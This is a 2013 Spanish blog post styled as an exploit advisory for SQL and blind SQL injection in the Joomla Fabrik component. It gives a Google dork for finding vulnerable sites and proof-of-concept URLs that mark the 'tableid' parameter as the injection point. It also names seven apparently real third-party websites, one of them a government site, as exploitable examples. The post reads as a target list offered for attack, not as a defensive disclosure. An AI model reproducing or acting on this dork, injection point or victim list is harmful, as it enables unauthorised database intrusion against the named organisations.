jueves, 3 de octubre de 2013

Vulnerability SQLi and BlindSQLi - Joomla.




[*] Exploit Títle           :   Vulnerabilities Joomla Fabrik - SQLi and BlindSQLi
[*] Exploit Author       :   Sky_BlaCk
[*] Versión                  :   1.5
[*] Tested on              :   Window and Linux
[*] Google dork         :   [inurl:index.php?option=com_fabrik]

-------------------------------
#     ~ Exploitation ~    #
-------------------------------


Concept :

SQL Injection is a method of infiltration arbitrary code that uses a computer vulnerabilities present in an application-level input validation to query a database.

The origin of the vulnerability lies in the wrong check and / or filtering of the variables used in a program that contains.




PoC - SQLi.

Variable : tableid

http://www.target.com/index.php?option=com_fabrik&view=table&tableid=[SQL Blind]&calculations=98&Itemid=75



PoC - SQLi.

Variable : tableid

http://www.taget.com/index.php?option=com_fabrik&view=table&tableid=[SQL Blind]&calculations=5&resetfilters=10&Itemid=94&lang=es





Example


[*] http://feceminte.cat/index.php?option=com_fabrik&view=table&tableid=4&calculations=0&Itemid=159&lang=es&act1=1

[*] http://osaarchivum.org/index.php?option=com_fabrik&view=table&tableid=5&calculations=0&Itemid=1520&lang=en&limitstart5=450


[*] http://www.alcaniz.es/index.php?option=com_fabrik&view=table&tableid=8&calculations=0&resetfilters=0&Itemid=466


[*] http://www.scb.travel/index.php?option=com_fabrik&view=table&tableid=9&calculations=0&Itemid=85


[*] http://www.ipse.gov.co/ipseactual2013/index.php?option=com_fabrik&view=table&tableid=6&calculations=0&resetfilters=0&Itemid=96&lang=es


[*] http://healthcare-resourcesgroup.com/index.php?option=com_fabrik&view=table&tableid=13&calculations=0&resetfilters=0&Itemid=267&limitstart13=20


[*] http://www.statmedicalsearch.com/index.php?option=com_fabrik&view=table&tableid=13&calculations=0&resetfilters=0&fabriklayout=default&Itemid=273&&limitstart13=40








[*] Especial greets : Aedo17 - Luffy22 -  Meredith19 - TodakarHD - Nettux - Gagan Jattana - Zapdos - Cat Du - Kais Patron.








No hay comentarios:

Publicar un comentario